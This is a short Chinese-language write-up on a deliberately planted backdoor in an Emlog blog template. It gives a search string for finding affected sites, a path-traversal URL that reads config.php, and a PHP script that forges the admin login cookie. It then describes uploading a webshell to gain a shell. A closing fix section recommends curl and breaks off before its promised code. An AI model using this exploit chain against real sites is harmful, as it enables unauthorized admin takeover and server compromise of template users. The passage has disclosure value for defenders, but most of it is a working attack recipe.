0x01 前言

明月浩空，一个Emlog模板的作者，因为在自己设计的模板中，故意安放网站木马后门漏洞，导致模板的使用者遭黑客恶意入侵风险。

0x02 搜索关键词

/content/templates/limh.me

0x03 已知后门地址

view-source: + 域名 + /content/templates/limh.me/function/image.php?url=../../../../config.php

这是一个任意文件内容读取的后门 可以读取 数据库等重要信息，这里我们利用计算Emlog 的Cookie来进行伪造管理员登录。

0x04 计算Cookie脚本

<?php
$time=time() + 60 * 60 * 24 * 30 * 12;
$key = hash_hmac('md5', 'admin|' . $time, '*****************************'); //这个是Key，admin为要欺骗的管理名
$hash=hash_hmac('md5', 'admin|' . $time, $key); //admin为要欺骗的管理名
$cookie='admin|' . $time."|".$hash; //admin为要欺骗的管理名
echo $cookie;
setcookie("*****************************",$cookie); //这个是cookiename
?>

计算出后，进入后台 默认地址 /admin 利用火狐的插件Cookie Edit加入Cookie Name是 AUTH_COOKIE_NAME 值为计算的

然后刷新网页 伪造cookie成功

然后上传插件地方上传大马，进行Getshell

本文章演示仅是本地搭建，请勿对非授权网站进行测试。

0x05 修复方法

将file_get_contents()替换成curl函数，※前提是PHP必须开启curl扩展curl函数呢，比file_get_contents()效率高，速度快，性能好，而且不会读取本地文件。以下是修复好的完整代码